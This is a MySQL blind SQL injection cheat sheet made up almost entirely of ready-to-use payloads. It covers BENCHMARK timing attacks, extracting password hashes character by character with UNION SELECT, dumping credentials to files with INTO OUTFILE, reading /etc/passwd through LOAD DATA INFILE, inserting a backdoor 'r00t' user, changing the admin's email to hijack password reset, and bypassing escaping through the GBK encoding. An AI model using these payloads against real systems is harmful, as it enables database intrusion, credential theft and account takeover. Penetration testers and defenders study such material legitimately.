Blind injection vectors.
Operators
SELECT 1 && 1;
SELECT 1 || 1;
SELECT 1 XOR 0;
Evaluate
all render TRUE or 1.
SELECT 0.1 <= 2;
SELECT 2 >= 2;
SELECT ISNULL(1/0);
Math
SELECT FLOOR(7 + (RAND() * 5));
SELECT ROUND(23.298, -1);
Misc
SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
SELECT MD5('abc');
Benchmark
SELECT BENCHMARK(10000000,ENCODE('abc','123'));
this takes around 5 sec on a localhost
SELECT BENCHMARK(1000000,MD5(CHAR(116)))
this takes around 7 sec on a localhost
SELECT BENCHMARK(10000000,MD5(CHAR(116)))
this takes around 70 sec on a localhost
Using the timeout to check if user exists
SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login
Beware of of the N rounds, add an extra zero and it could stall or crash your
browser!
Gathering info
Table mapping
SELECT COUNT(*) FROM tablename
Field mapping
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user LIKE "%"
SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;
SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;
User mapping
SELECT * FROM tablename WHERE email = 'user@site.com';
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user = 'username'
Advanced SQL vectors
Writing info into files
SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE
'/path/location/on/server/www/passes.txt'
Writing info into files without single quotes: (example)
SELECT password FROM tablename WHERE username =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105) ,CHAR(110),CHAR( 39)) INTO OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100) ,CHAR(109),CHAR(105),CHAR(110),CHAR(39))
Note: You must specify a new file, it may not exist! and give the correct
pathname!
The CHAR() quoteless function
SELECT * FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105) ,CHAR(110),CHAR( 39))
SELECT * FROM login WHERE user = CHAR(39,97,39)
Extracting hashes
SELECT user FROM login WHERE user = 'root'
UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login
example:
SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login
SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5('x')),null) FROM login
explaining: (passwordfield,startcharacter,selectlength)
is like: (password,1,2) this selects: ‘ab’
is like: (password,1,3) this selects: ‘abc’
is like: (password,1,4) this selects: ‘abcd’
A quoteless example:
SELECT user FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105) ,CHAR(110),CHAR( 39))
UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login
Possible chars: 0 to 9 - ASCII 48 to 57 ~ a to z - ASCII 97 to 122
Misc
Insert a new user into DB
INSERT INTO login SET user = 'r00t', pass = 'abc'
Retrieve /etc/passwd file, put it into a field and insert a new user
load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user =
'r00t', pass = 'abc'
Then login!
Write the DB user away into tmp
SELECT host,user,password FROM user into outfile '/tmp/passwd';
Change admin e-mail, for “forgot login retrieval.”
UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com';
Bypassing PHP functions
(MySQL 4.1.x before 4.1.20 and 5.0.x)
Bypassing addslashes() with GBK encoding
WHERE x = 0xbf27admin 0xbf27
Bypassing mysql_real_escape_string() with BIG5 or GBK
"injection string"
